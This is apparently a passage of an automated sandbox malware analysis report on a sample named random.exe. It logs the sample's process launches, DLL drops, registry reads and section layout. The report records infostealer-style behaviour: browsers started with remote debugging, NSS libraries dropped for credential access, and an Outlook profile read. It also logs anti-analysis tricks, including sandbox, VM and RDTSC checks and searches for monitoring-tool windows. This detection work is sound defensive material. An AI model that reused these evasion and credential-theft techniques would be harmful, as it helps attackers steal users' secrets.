              Source: C:\Users\user\Desktop\random.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2352,i,1975572697325823558,303992249560351608,262144 /prefetch:3
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2176,i,17110791919059724863,15675656893118649044,262144 /prefetch:3
              Source: C:\Users\user\Desktop\random.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
              Source: C:\Users\user\Desktop\random.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2128,i,8333296015523379162,13554490080729911822,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2352,i,1975572697325823558,303992249560351608,262144 /prefetch:3Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2176,i,17110791919059724863,15675656893118649044,262144 /prefetch:3Jump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: random.exeStatic file information: File size 1797120 > 1048576
              Source: random.exeStatic PE information: Raw size of buqtyugz is bigger than: 0x100000 < 0x19c600
              Source: Binary string: mozglue.pdbP source: random.exe, 00000000.00000002.1890959864.000000006CACD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: random.exe, 00000000.00000002.1891227308.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: random.exe, 00000000.00000002.1890959864.000000006CACD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\random.exeUnpacked PE file: 0.2.random.exe.50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;buqtyugz:EW;edxdhysn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;buqtyugz:EW;edxdhysn:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA53480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6CA53480
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: random.exeStatic PE information: real checksum: 0x1bb8cf should be: 0x1b9449
              Source: random.exeStatic PE information: section name:
              Source: random.exeStatic PE information: section name: .idata
              Source: random.exeStatic PE information: section name:
              Source: random.exeStatic PE information: section name: buqtyugz
              Source: random.exeStatic PE information: section name: edxdhysn
              Source: random.exeStatic PE information: section name: .taggant
              Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
              Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
              Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
              Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
              Source: msvcp140.dll.0.drStatic PE information: section name: .didat
              Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
              Source: nss3.dll.0.drStatic PE information: section name: .00cfg
              Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CA8B536 push ecx; ret 0_2_6CA8B549
              Source: random.exeStatic PE information: section name: buqtyugz entropy: 7.953973444051104
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
              Source: C:\Users\user\Desktop\random.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

              Boot Survival

              barindex
              Monitors registry run keys for changes
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\random.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\random.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Users\user\Desktop\random.exeCode function: 0_2_6CAB55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6CAB55F0

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\random.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\random.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 2A02E4 second address: 29FBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFCE8B91D06h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007EFCE8B91D13h 0x00000013 push dword ptr [ebp+122D1465h] 0x00000019 sub dword ptr [ebp+122D1E97h], ecx 0x0000001f call dword ptr [ebp+122D3724h] 0x00000025 pushad 0x00000026 js 00007EFCE8B91D07h 0x0000002c xor eax, eax 0x0000002e clc 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 or dword ptr [ebp+122D36C7h], eax 0x00000039 mov dword ptr [ebp+122D3A5Eh], eax 0x0000003f mov dword ptr [ebp+122D2AEEh], ecx 0x00000045 mov dword ptr [ebp+122D2AEEh], edi 0x0000004b mov esi, 0000003Ch 0x00000050 pushad 0x00000051 jmp 00007EFCE8B91D19h 0x00000056 mov dh, FFh 0x00000058 popad 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d clc 0x0000005e lodsw 0x00000060 pushad 0x00000061 jmp 00007EFCE8B91D0Dh 0x00000066 sbb edi, 50EC7CA2h 0x0000006c popad 0x0000006d cmc 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 sub dword ptr [ebp+122D2AEEh], eax 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c jno 00007EFCE8B91D14h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007EFCE8B91D0Fh 0x0000008a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41A629 second address: 41A63F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92350h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41A63F second address: 41A644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41A644 second address: 41A650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFCE8B92346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41A650 second address: 41A670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFCE8B91D06h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFCE8B91D10h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41A670 second address: 41A68E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92357h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 405390 second address: 40539D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007EFCE8B91D06h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 419918 second address: 419936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFCE8B92346h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007EFCE8B9234Dh 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 419936 second address: 419946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFCE8B91D06h 0x0000000a ja 00007EFCE8B91D06h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 419DC4 second address: 419DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 419DCA second address: 419DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 419DCF second address: 419DE8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFCE8B9235Bh 0x00000008 jmp 00007EFCE8B9234Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41CD4E second address: 29FBAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007EFCE8B91D10h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 2F50322Bh 0x00000012 mov edi, 128D3F92h 0x00000017 push dword ptr [ebp+122D1465h] 0x0000001d and esi, 7885DDCAh 0x00000023 call dword ptr [ebp+122D3724h] 0x00000029 pushad 0x0000002a js 00007EFCE8B91D07h 0x00000030 clc 0x00000031 xor eax, eax 0x00000033 clc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 or dword ptr [ebp+122D36C7h], eax 0x0000003e mov dword ptr [ebp+122D3A5Eh], eax 0x00000044 mov dword ptr [ebp+122D2AEEh], ecx 0x0000004a mov dword ptr [ebp+122D2AEEh], edi 0x00000050 mov esi, 0000003Ch 0x00000055 pushad 0x00000056 jmp 00007EFCE8B91D19h 0x0000005b mov dh, FFh 0x0000005d popad 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 clc 0x00000063 lodsw 0x00000065 pushad 0x00000066 jmp 00007EFCE8B91D0Dh 0x0000006b sbb edi, 50EC7CA2h 0x00000071 popad 0x00000072 cmc 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 sub dword ptr [ebp+122D2AEEh], eax 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 jno 00007EFCE8B91D14h 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007EFCE8B91D0Fh 0x0000008f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41CD99 second address: 41CE3C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFCE8B92348h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007EFCE8B92350h 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1F13h], ecx 0x00000019 push 00000000h 0x0000001b cld 0x0000001c push 23625FDBh 0x00000021 pushad 0x00000022 jo 00007EFCE8B9234Ch 0x00000028 jno 00007EFCE8B92346h 0x0000002e push ebx 0x0000002f jmp 00007EFCE8B92356h 0x00000034 pop ebx 0x00000035 popad 0x00000036 xor dword ptr [esp], 23625F5Bh 0x0000003d or dword ptr [ebp+122D1809h], ebx 0x00000043 push 00000003h 0x00000045 movsx edi, dx 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007EFCE8B92348h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000015h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 push esi 0x00000065 jmp 00007EFCE8B92352h 0x0000006a pop edx 0x0000006b push 00000003h 0x0000006d push 8718EEDAh 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41CE3C second address: 41CE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41CED7 second address: 41CEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41CEDB second address: 41CF2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2C63h], eax 0x00000010 push edx 0x00000011 mov dword ptr [ebp+122D2BCAh], ecx 0x00000017 pop edx 0x00000018 push 00000000h 0x0000001a and dh, 0000006Fh 0x0000001d call 00007EFCE8B91D09h 0x00000022 pushad 0x00000023 jmp 00007EFCE8B91D12h 0x00000028 jmp 00007EFCE8B91D0Ah 0x0000002d popad 0x0000002e push eax 0x0000002f jc 00007EFCE8B91D14h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41CF2A second address: 41CF41 instructions: 0x00000000 rdtsc 0x00000002 jne 00007EFCE8B92346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007EFCE8B92346h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41D08C second address: 41D090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41D090 second address: 41D0A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007EFCE8B92346h 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 41D0A4 second address: 41D18D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, dword ptr [ebp+122D386Eh] 0x00000010 push 00000000h 0x00000012 pushad 0x00000013 mov ebx, eax 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 push 8CFFBCCEh 0x0000001e jmp 00007EFCE8B91D18h 0x00000023 add dword ptr [esp], 730043B2h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007EFCE8B91D08h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D3A76h] 0x0000004a push 00000003h 0x0000004c mov edi, dword ptr [ebp+122D3852h] 0x00000052 push 00000000h 0x00000054 call 00007EFCE8B91D14h 0x00000059 movsx edi, si 0x0000005c pop edi 0x0000005d push 00000003h 0x0000005f movsx ecx, cx 0x00000062 push 57EFE2B3h 0x00000067 push eax 0x00000068 jmp 00007EFCE8B91D14h 0x0000006d pop eax 0x0000006e add dword ptr [esp], 68101D4Dh 0x00000075 mov di, 868Bh 0x00000079 lea ebx, dword ptr [ebp+12450CD5h] 0x0000007f push ecx 0x00000080 pop edi 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 jmp 00007EFCE8B91D15h 0x00000089 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B46B second address: 43B46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B46F second address: 43B475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B475 second address: 43B47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
